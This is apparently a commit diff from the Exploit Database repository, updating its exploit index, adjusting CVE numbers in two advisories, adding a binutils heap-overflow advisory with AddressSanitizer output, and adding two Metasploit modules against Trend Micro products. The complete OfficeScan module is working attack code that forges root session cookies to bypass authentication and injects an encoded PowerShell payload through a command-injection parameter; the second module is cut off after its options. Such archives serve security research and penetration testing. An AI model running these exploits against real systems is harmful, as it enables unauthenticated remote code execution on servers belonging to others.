37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0
|
||||
37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
|
||||
37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
|
||||
37417,platforms/php/webapps/37417.php,"Multiple WordPress Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||
37418,platforms/php/webapps/37418.php,"WordPress Plugin LB Mixed Slideshow - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||
37419,platforms/php/webapps/37419.txt,"WordPress Plugin Wp-ImageZoom - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||
|
@ -36353,7 +36356,7 @@ id,file,description,date,author,platform,type,port
|
|||
37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",multiple,webapps,0
|
||||
37767,platforms/multiple/webapps/37767.txt,"Joomla! Component 'com_jem' 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0
|
||||
37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0
|
||||
37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0
|
||||
37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0
|
||||
37773,platforms/php/webapps/37773.txt,"Joomla! Component 'com_memorix' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
|
||||
37774,platforms/php/webapps/37774.txt,"Joomla! Component 'com_informations' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0
|
||||
37778,platforms/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",hardware,webapps,0
|
||||
|
@ -36403,8 +36406,8 @@ id,file,description,date,author,platform,type,port
|
|||
37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'searchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0
|
||||
37885,platforms/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose and Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload and Execute Exploit",2015-08-19,LiquidWorm,php,webapps,9999
|
||||
37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
|
||||
37892,platforms/asp/webapps/37892.txt,"Vifi Radio 1.0 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80
|
||||
37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
|
||||
|
@ -37231,7 +37234,7 @@ id,file,description,date,author,platform,type,port
|
|||
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
|
||||
39626,platforms/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent Cross-Site Scripting",2016-03-28,"Sarim Kiani",multiple,webapps,80
|
||||
39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
|
||||
39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
|
||||
39573,platforms/windows/webapps/39573.txt,"Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
|
||||
39575,platforms/php/webapps/39575.txt,"WordPress Plugin eBook Download 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
|
||||
39576,platforms/php/webapps/39576.txt,"WordPress Plugin Import CSV 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
|
||||
39577,platforms/php/webapps/39577.txt,"WordPress Plugin Abtest - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
|
||||
|
@ -38306,7 +38309,7 @@ id,file,description,date,author,platform,type,port
|
|||
42064,platforms/multiple/webapps/42064.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'Editor::Command::execute' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42067,platforms/multiple/webapps/42067.html,"WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42067,platforms/multiple/webapps/42067.html,"WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42068,platforms/multiple/webapps/42068.html,"WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
|
||||
|
@ -38320,7 +38323,7 @@ id,file,description,date,author,platform,type,port
|
|||
42101,platforms/linux/webapps/42101.py,"Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read",2017-06-01,"Gregory Draperi",linux,webapps,0
|
||||
42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
||||
42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
||||
42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
||||
42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
||||
42111,platforms/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",json,webapps,0
|
||||
42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0
|
||||
42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0
|
||||
|
@ -38401,7 +38404,7 @@ id,file,description,date,author,platform,type,port
|
|||
42359,platforms/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",php,webapps,0
|
||||
42371,platforms/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",json,webapps,0
|
||||
42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
|
||||
42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
|
||||
42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
|
||||
42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
|
||||
42380,platforms/php/webapps/42380.txt,"Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection",2017-07-25,8bitsec,php,webapps,0
|
||||
42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
|
||||
|
@ -38667,3 +38670,5 @@ id,file,description,date,author,platform,type,port
|
|||
42966,platforms/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-10-09,intx0x80,jsp,webapps,0
|
||||
42967,platforms/php/webapps/42967.txt,"ClipShare 7.0 - SQL Injection",2017-10-09,8bitsec,php,webapps,0
|
||||
42968,platforms/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps,0
|
||||
42971,platforms/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
|
||||
42972,platforms/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -2,7 +2,7 @@ Title: OpenText Document Sciences xPression (formerly EMC Document
|
|||
Sciences xPression) - SQL Injection
|
||||
Author: Marcin Woloszyn
|
||||
Date: 27. September 2017
|
||||
CVE: CVE-2017-14758
|
||||
CVE: CVE-2017-14757
|
||||
|
||||
Affected Software:
|
||||
==================
|
||||
|
|
|
@ -2,7 +2,7 @@ Title: OpenText Document Sciences xPression (formerly EMC Document
|
|||
Sciences xPression) - SQL Injection
|
||||
Author: Marcin Woloszyn
|
||||
Date: 27. September 2017
|
||||
CVE: CVE-2017-14757
|
||||
CVE: CVE-2017-14758
|
||||
|
||||
Affected Software:
|
||||
==================
|
||||
|
|
112
platforms/linux/dos/42970.txt
Executable file
112
platforms/linux/dos/42970.txt
Executable file
|
@ -0,0 +1,112 @@
|
|||
Source: https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
|
||||
|
||||
Description:
|
||||
binutils is a set of tools necessary to build programs.
|
||||
|
||||
The complete ASan output of the issue:
|
||||
|
||||
# nm -A -a -l -S -s --special-syms --synthetic --with-symbol-versions -D $FILE
|
||||
==3235==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x613000000512 at pc 0x7f7c93ae3c88 bp 0x7ffe38d7a970 sp 0x7ffe38d7a968
|
||||
READ of size 1 at 0x613000000512 thread T0
|
||||
#0 0x7f7c93ae3c87 in read_1_byte /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10
|
||||
#1 0x7f7c93ae3c87 in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2311
|
||||
#2 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
|
||||
#3 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
|
||||
#4 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
|
||||
#5 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
|
||||
#6 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
|
||||
#7 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
|
||||
#8 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
|
||||
#9 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
|
||||
#10 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
|
||||
#11 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
|
||||
#12 0x41ac18 in _init (/usr/x86_64-pc-linux-gnu/binutils-bin/git/nm+0x41ac18)
|
||||
|
||||
0x613000000512 is located 0 bytes to the right of 338-byte region [0x6130000003c0,0x613000000512)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4d8e08 in malloc /var/tmp/portage/sys-libs/compiler-rt-sanitizers-5.0.0/work/compiler-rt-5.0.0.src/lib/asan/asan_malloc_linux.cc:67
|
||||
#1 0x7f7c9393a37c in bfd_malloc /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/libbfd.c:193:9
|
||||
#2 0x7f7c9392fb2f in bfd_get_full_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/compress.c:248:21
|
||||
#3 0x7f7c939696d3 in bfd_simple_get_relocated_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/simple.c:193:12
|
||||
#4 0x7f7c93ade26e in read_section /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:556:8
|
||||
#5 0x7f7c93adef3c in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2047:9
|
||||
#6 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
|
||||
#7 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
|
||||
#8 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
|
||||
#9 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
|
||||
#10 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
|
||||
#11 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
|
||||
#12 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
|
||||
#13 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
|
||||
#14 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
|
||||
#15 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10 in read_1_byte
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c267fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x0c267fff8060: 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa fa
|
||||
0x0c267fff8070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
|
||||
0x0c267fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x0c267fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
=>0x0c267fff80a0: 00 00[02]fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c267fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c267fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c267fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c267fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c267fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
Container overflow: fc
|
||||
Array cookie: ac
|
||||
Intra object redzone: bb
|
||||
ASan internal: fe
|
||||
Left alloca redzone: ca
|
||||
Right alloca redzone: cb
|
||||
==3235==ABORTING
|
||||
Affected version:
|
||||
2.29.51.20170921 and maybe past releases
|
||||
|
||||
Fixed version:
|
||||
N/A
|
||||
|
||||
Commit fix:
|
||||
https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=515f23e63c0074ab531bc954f84ca40c6281a724
|
||||
|
||||
Credit:
|
||||
This bug was discovered by Agostino Sarubbo of Gentoo.
|
||||
|
||||
CVE:
|
||||
CVE-2017-14939
|
||||
|
||||
Reproducer:
|
||||
https://github.com/asarubbo/poc/blob/master/00370-binutils-heapoverflow-read_1_byte
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip
|
||||
|
||||
Timeline:
|
||||
2017-09-21: bug discovered and reported to upstream
|
||||
2017-09-24: upstream released a patch
|
||||
2017-09-26: blog post about the issue
|
||||
2017-09-29: CVE assigned
|
||||
|
||||
Note:
|
||||
This bug was found with American Fuzzy Lop.
|
||||
This bug was identified with bare metal servers donated by Packet. This work is also supported by the Core Infrastructure Initiative.
|
||||
|
||||
Permalink:
|
||||
|
||||
https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip
|
216
platforms/php/webapps/42971.rb
Executable file
216
platforms/php/webapps/42971.rb
Executable file
|
@ -0,0 +1,216 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Trend Micro OfficeScan Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
|
||||
terminal command under the context of the web server user.
|
||||
|
||||
The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product
|
||||
has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which
|
||||
leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process
|
||||
does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
|
||||
unauthenticated users can execute a terminal command under the context of the web server user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'mr_me <mr_me@offensive-security.com>', # author of command injection
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
|
||||
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'RPORT' => 443
|
||||
},
|
||||
'Platform' => ['win'],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic Targeting', { 'auto' => true }],
|
||||
['OfficeScan 11', {}],
|
||||
['OfficeScan XG', {}],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Oct 7 2017",
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def build_csrftoken(my_target, phpsessid=nil)
|
||||
vprint_status("Building csrftoken")
|
||||
if my_target.name == 'OfficeScan XG'
|
||||
csrf_token = Rex::Text.md5(Time.now.to_s)
|
||||
else
|
||||
csrf_token = phpsessid.scan(/PHPSESSID=([a-zA-Z0-9]+)/).flatten[0]
|
||||
end
|
||||
csrf_token
|
||||
end
|
||||
|
||||
def auto_target
|
||||
#XG version of the widget library has package.json within the same directory.
|
||||
mytarget = target
|
||||
if target['auto'] && target.name =~ /Automatic/
|
||||
print_status('Automatic targeting enabled. Trying to detect version.')
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'package.json'),
|
||||
})
|
||||
|
||||
if res && res.code == 200
|
||||
mytarget = targets[2]
|
||||
elsif res && res.code == 404
|
||||
mytarget = targets[1]
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Unable to automatically select a target')
|
||||
end
|
||||
print_status("Selected target system : #{mytarget.name}")
|
||||
end
|
||||
mytarget
|
||||
end
|
||||
|
||||
def auth(my_target)
|
||||
# Version XG performs MD5 validation on wf_CSRF_token parameter. We can't simply use PHPSESSID directly because it contains a-zA-Z0-9.
|
||||
# Beside that, version 11 use PHPSESSID value as a csrf token. Thus, we are manually crafting the cookie.
|
||||
if my_target.name == 'OfficeScan XG'
|
||||
csrf_token = build_csrftoken(my_target)
|
||||
cookie = "LANG=en_US; LogonUser=root; userID=1; wf_CSRF_token=#{csrf_token}"
|
||||
# Version 11 want to see valid PHPSESSID from beginning to the end. For this reason we need to force backend to initiate one for us.
|
||||
else
|
||||
vprint_status("Sending session initiation request for : #{my_target.name}.")
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'index.php'),
|
||||
})
|
||||
cookie = "LANG=en_US; LogonUser=root; userID=1; #{res.get_cookies}"
|
||||
csrf_token = build_csrftoken(my_target, res.get_cookies)
|
||||
end
|
||||
|
||||
# Okay, we dynamically generated a cookie and csrf_token values depends on OfficeScan version.
|
||||
# Now we need to exploit authentication bypass vulnerability.
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'ui', 'modLogin', 'talker.php'),
|
||||
'headers' => {
|
||||
'X-CSRFToken' => csrf_token,
|
||||
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
|
||||
},
|
||||
'cookie' => cookie,
|
||||
'vars_post' => {
|
||||
'cid' => '1',
|
||||
'act' => 'check',
|
||||
'hash' => Rex::Text.rand_text_alpha(10),
|
||||
'pid' => '1'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body.include?('login successfully')
|
||||
# Another business logic in here.
|
||||
# Version 11 want to use same PHPSESSID generated at the beginning by hitting index.php
|
||||
# Version XG want to use newly created PHPSESSID that comes from auth bypass response.
|
||||
if my_target.name == 'OfficeScan XG'
|
||||
res.get_cookies
|
||||
else
|
||||
cookie
|
||||
end
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
my_target = auto_target
|
||||
token = auth(my_target)
|
||||
# If we dont have a cookie that means authentication bypass issue has been patched on target system.
|
||||
if token.nil?
|
||||
Exploit::CheckCode::Safe
|
||||
else
|
||||
# Authentication bypass does not mean that we have a command injection.
|
||||
# Accessing to the widget framework without having command injection means literally nothing.
|
||||
# So we gonna trigger command injection vulnerability without a payload.
|
||||
csrf_token = build_csrftoken(my_target, token)
|
||||
vprint_status('Trying to detect command injection vulnerability')
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
|
||||
'headers' => {
|
||||
'X-CSRFToken' => csrf_token,
|
||||
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
|
||||
},
|
||||
'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{token}",
|
||||
'vars_post' => {
|
||||
'module' => 'modTMCSS',
|
||||
'serverid' => '1',
|
||||
'TOP' => ''
|
||||
}
|
||||
})
|
||||
if res && res.code == 200 && res.body.include?('Proxy execution failed: exec report.php failed')
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
mytarget = auto_target
|
||||
print_status('Exploiting authentication bypass')
|
||||
cookie = auth(mytarget)
|
||||
if cookie.nil?
|
||||
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
|
||||
else
|
||||
print_good("Authenticated successfully bypassed.")
|
||||
end
|
||||
|
||||
print_status('Generating payload')
|
||||
|
||||
powershell_options = {
|
||||
encode_final_payload: true,
|
||||
remove_comspec: true
|
||||
}
|
||||
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
|
||||
|
||||
|
||||
# We need to craft csrf value for version 11 again like we did before at auth function.
|
||||
csrf_token = build_csrftoken(mytarget, cookie)
|
||||
|
||||
print_status('Trigerring command injection vulnerability')
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'),
|
||||
'headers' => {
|
||||
'X-CSRFToken' => csrf_token,
|
||||
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8'
|
||||
},
|
||||
'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{cookie}",
|
||||
'vars_post' => {
|
||||
'module' => 'modTMCSS',
|
||||
'serverid' => '1',
|
||||
'TOP' => "2>&1||#{p}"
|
||||
}
|
||||
})
|
||||
|
||||
end
|
||||
end
|
130
platforms/php/webapps/42972.rb
Executable file
130
platforms/php/webapps/42972.rb
Executable file
|
@ -0,0 +1,130 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
|
||||
terminal command under the context of the web server user.
|
||||
|
||||
The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product
|
||||
have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which
|
||||
leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process
|
||||
does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
|
||||
unauthenticated users can execute a terminal command under the context of the web server user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'mr_me <mr_me@offensive-security.com>', # author of command injection
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
|
||||
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'RPORT' => 8445
|
||||
},
|
||||
